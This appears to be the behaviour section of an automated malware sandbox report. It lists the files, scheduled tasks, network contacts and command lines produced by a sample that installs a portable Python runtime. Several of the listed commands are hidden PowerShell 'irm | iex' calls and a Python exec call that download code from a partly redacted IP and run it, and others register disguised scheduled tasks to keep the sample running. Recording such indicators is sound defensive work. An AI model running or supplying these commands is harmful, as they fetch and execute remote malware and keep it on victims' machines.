Technical Information
- <SYSTEM32>\tasks\systemlinqtask.vaulta.{0f74844c-3f919f-a0fce-e001b-ca48dd10mvaegawk}
- <SYSTEM32>\tasks\interactiveservices\microsoftpowershellgpowershelltask.cl_nfts-1-5-21-4226853953-3309226944-3078887307-1000
- <SYSTEM32>\tasks\systemreflectioncontexttask.
- <SYSTEM32>\subst.exe
- %TEMP%\__psscriptpolicytest_i45gpqf1.lcb.ps1
- %TEMP%\__psscriptpolicytest_r4whgy40.msn.psm1
- %TEMP%\content\3984-2044-<File name>.exe-14-44-09-043.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-09-109.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-09-142.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-11-899.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-12-348.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-12-401.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-12-564.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-12-586.dump
- %TEMP%\__psscriptpolicytest_1hgtkqhl.yw2.ps1
- %TEMP%\__psscriptpolicytest_z0ju0imb.uvk.psm1
- %TEMP%\content\3984-2044-<File name>.exe-14-44-12-988.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-13-019.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-13-136.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-13-220.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-19-910.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-126.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-157.dump
- %TEMP%\__psscriptpolicytest_vh50bfo0.qtz.ps1
- %TEMP%\__psscriptpolicytest_vaefxswu.vol.psm1
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-374.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-411.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-458.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-759.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-829.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-20-960.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-21-029.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-21-092.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-21-130.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-21-462.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-21-647.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-21-747.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-21-801.dump
- %TEMP%\content\3984-2044-<File name>.exe-14-44-22-682.dump
- %LOCALAPPDATA%\microsoft\windows\powershell\moduleanalysiscache
- %TEMP%\content\3984-2044-<File name>.exe-14-44-25-746.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-39-829.dump
- %TEMP%\__psscriptpolicytest_mbr1brey.3wp.ps1
- %TEMP%\__psscriptpolicytest_mxia3bcw.hbr.psm1
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-030.dump
- %TEMP%\__psscriptpolicytest_5dxkfdfk.sl3.ps1
- %TEMP%\__psscriptpolicytest_1mcmncao.3ru.psm1
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-215.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-246.dump
- %TEMP%\__psscriptpolicytest_m1h0azdl.3xe.ps1
- %TEMP%\__psscriptpolicytest_niaxw3im.zy4.psm1
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-447.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-478.dump
- %TEMP%\__psscriptpolicytest_smpiocuv.rrj.ps1
- %TEMP%\__psscriptpolicytest_hm3tzqcy.jxu.psm1
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-648.dump
- %TEMP%\__psscriptpolicytest_mqh3ojbp.da3.ps1
- %TEMP%\__psscriptpolicytest_stb50o5b.sm0.psm1
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-802.dump
- %TEMP%\__psscriptpolicytest_r4rjical.u0p.ps1
- %TEMP%\__psscriptpolicytest_wrme3fsf.1z4.psm1
- %TEMP%\content\3984-2044-<File name>.exe-04-44-40-983.dump
- %TEMP%\__psscriptpolicytest_hazrn3kc.z0n.ps1
- %TEMP%\__psscriptpolicytest_e4m4e1e0.vg0.psm1
- %TEMP%\content\3984-2044-<File name>.exe-04-44-41-146.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-41-199.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-41-215.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-43-948.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-44-151.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-44-490.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-44-637.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-169.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-222.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-264.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-330.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-395.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-474.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-506.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-547.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-613.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-636.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-679.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-708.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-731.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-45-985.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-123.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-163.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-269.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-325.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-434.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-502.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-556.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-598.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-694.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-748.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-783.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-815.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-46-903.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-47-032.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-47-213.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-47-442.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-44-47-476.dump
- %TEMP%\python-3.14.6-embed-amd64.zip
- %TEMP%\content\3984-2044-<File name>.exe-04-44-51-417.dump
- %LOCALAPPDATA%\pythonportable\py\python.exe
- %LOCALAPPDATA%\pythonportable\py\pythonw.exe
- %LOCALAPPDATA%\pythonportable\py\python314.dll
- %LOCALAPPDATA%\pythonportable\py\python3.dll
- %LOCALAPPDATA%\pythonportable\py\vcruntime140.dll
- %LOCALAPPDATA%\pythonportable\py\vcruntime140_1.dll
- %LOCALAPPDATA%\pythonportable\py\license.txt
- %LOCALAPPDATA%\pythonportable\py\pyexpat.pyd
- %LOCALAPPDATA%\pythonportable\py\select.pyd
- %LOCALAPPDATA%\pythonportable\py\unicodedata.pyd
- %LOCALAPPDATA%\pythonportable\py\winsound.pyd
- %LOCALAPPDATA%\pythonportable\py\_asyncio.pyd
- %LOCALAPPDATA%\pythonportable\py\_bz2.pyd
- %LOCALAPPDATA%\pythonportable\py\_ctypes.pyd
- %LOCALAPPDATA%\pythonportable\py\_decimal.pyd
- %LOCALAPPDATA%\pythonportable\py\_elementtree.pyd
- %LOCALAPPDATA%\pythonportable\py\_hashlib.pyd
- %LOCALAPPDATA%\pythonportable\py\_lzma.pyd
- %LOCALAPPDATA%\pythonportable\py\_multiprocessing.pyd
- %LOCALAPPDATA%\pythonportable\py\_overlapped.pyd
- %LOCALAPPDATA%\pythonportable\py\_queue.pyd
- %LOCALAPPDATA%\pythonportable\py\_remote_debugging.pyd
- %LOCALAPPDATA%\pythonportable\py\_socket.pyd
- %LOCALAPPDATA%\pythonportable\py\_sqlite3.pyd
- %LOCALAPPDATA%\pythonportable\py\_ssl.pyd
- %LOCALAPPDATA%\pythonportable\py\_uuid.pyd
- %LOCALAPPDATA%\pythonportable\py\_wmi.pyd
- %LOCALAPPDATA%\pythonportable\py\_zoneinfo.pyd
- %LOCALAPPDATA%\pythonportable\py\_zstd.pyd
- %LOCALAPPDATA%\pythonportable\py\libcrypto-3.dll
- %LOCALAPPDATA%\pythonportable\py\libffi-8.dll
- %LOCALAPPDATA%\pythonportable\py\libssl-3.dll
- %LOCALAPPDATA%\pythonportable\py\sqlite3.dll
- %LOCALAPPDATA%\pythonportable\py\python314.zip
- %LOCALAPPDATA%\pythonportable\py\python314._pth
- %LOCALAPPDATA%\pythonportable\py\python.cat
- %APPDATA%\blocks.xml
- %LOCALAPPDATA%\pythonportable\py\py3.py
- %TEMP%\s029geac
- %TEMP%\remote_task__sjq3i70.py
- %TEMP%\content\3984-2044-<File name>.exe-04-44-54-615.dump
- %TEMP%\sbpv677d
- %TEMP%\task_peowc4gz.xml
- %TEMP%\content\3984-2044-<File name>.exe-04-45-01-706.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-01-775.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-02-986.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-033.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-064.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-102.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-149.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-165.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-203.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-234.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-281.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-303.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-334.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-381.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-403.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-450.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-481.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-504.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-535.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-566.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-589.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-620.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-651.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-805.dump
- %TEMP%\content\3984-2044-<File name>.exe-04-45-03-852.dump
- %TEMP%\__psscriptpolicytest_i45gpqf1.lcb.ps1
- %TEMP%\__psscriptpolicytest_r4whgy40.msn.psm1
- %TEMP%\__psscriptpolicytest_1hgtkqhl.yw2.ps1
- %TEMP%\__psscriptpolicytest_z0ju0imb.uvk.psm1
- %TEMP%\__psscriptpolicytest_vh50bfo0.qtz.ps1
- %TEMP%\__psscriptpolicytest_vaefxswu.vol.psm1
- %TEMP%\__psscriptpolicytest_mbr1brey.3wp.ps1
- %TEMP%\__psscriptpolicytest_mxia3bcw.hbr.psm1
- %TEMP%\__psscriptpolicytest_5dxkfdfk.sl3.ps1
- %TEMP%\__psscriptpolicytest_1mcmncao.3ru.psm1
- %TEMP%\__psscriptpolicytest_m1h0azdl.3xe.ps1
- %TEMP%\__psscriptpolicytest_niaxw3im.zy4.psm1
- %TEMP%\__psscriptpolicytest_smpiocuv.rrj.ps1
- %TEMP%\__psscriptpolicytest_hm3tzqcy.jxu.psm1
- %TEMP%\__psscriptpolicytest_mqh3ojbp.da3.ps1
- %TEMP%\__psscriptpolicytest_stb50o5b.sm0.psm1
- %TEMP%\__psscriptpolicytest_r4rjical.u0p.ps1
- %TEMP%\__psscriptpolicytest_wrme3fsf.1z4.psm1
- %TEMP%\__psscriptpolicytest_hazrn3kc.z0n.ps1
- %TEMP%\__psscriptpolicytest_e4m4e1e0.vg0.psm1
- %TEMP%\python-3.14.6-embed-amd64.zip
- %TEMP%\s029geac
- %APPDATA%\blocks.xml
- %TEMP%\sbpv677d
- %TEMP%\task_peowc4gz.xml
- %TEMP%\remote_task__sjq3i70.py
- '89.##7.80.106':80
- 'py##on.org':443
- http://89.##7.80.106/py
- http://89.##7.80.106/py2
- http://89.##7.80.106/python?s=#########
- 'py##on.org':443
- DNS ASK py##on.org
- '%LOCALAPPDATA%\pythonportable\py\python.exe' --version
- '%LOCALAPPDATA%\pythonportable\py\python.exe' -c "import os import urllib.request as u os.environ['PY_PORTABLE_HOME'] = r'%LOCALAPPDATA%\PythonPortable\py' src = u.urlopen(r'http://89.##7.80.106/py1', timeout=60).read() exec(compile(src, r...
- '%LOCALAPPDATA%\pythonportable\py\python.exe' %TEMP%\remote_task__sjq3i70.py --scheduled-py %LOCALAPPDATA%\PythonPortable\py\py3.py --python-exe %LOCALAPPDATA%\PythonPortable\py\pythonw.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -W hidden -Command " $ErrorActionPreference = 'SilentlyContinue' $home = '%LOCALAPPDATA%\PythonPortable\py' $targetExe = '%LOCALAPPDATA%\PythonPortable\py\pythonw.exe' Get-ScheduledT...
- '<SYSTEM32>\subst.exe' /G21DU5zLPWn5iD1nfn2rjf1uqj4M4
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\findstr.exe' /B "/C:OS Name" /B "/C:OS Version"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command Start-Process powershell.exe -WindowStyle Hidden -ArgumentList '-NoProfile','-ExecutionPolicy','Bypass','-Command','irm http://89.##7.80.106/py | iex...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command irm http://89.##7.80.106/py | iex
- '<SYSTEM32>\schtasks.exe' /create /tn \InteractiveServices\MicrosoftPowerShellGPowerShellTask.CL_NFTS-1-5-21-4226853953-3309226944-3078887307-1000 /xml %APPDATA%\Blocks.xml /f
- '<SYSTEM32>\cscript.exe' <SYSTEM32>\slmgr.vbs /dlv
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -W hidden -Command [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
- '<SYSTEM32>\schtasks.exe' /create /tn SystemReflectionContextTask. /xml %TEMP%\task_peowc4gz.xml /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command Start-Process powershell.exe -WindowStyle Hidden -ArgumentList '-NoProfile','-ExecutionPolicy','Bypass','-Command','irm http://89.##7.80.106/py | iex...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command irm http://89.##7.80.106/py | iex' (with hidden window)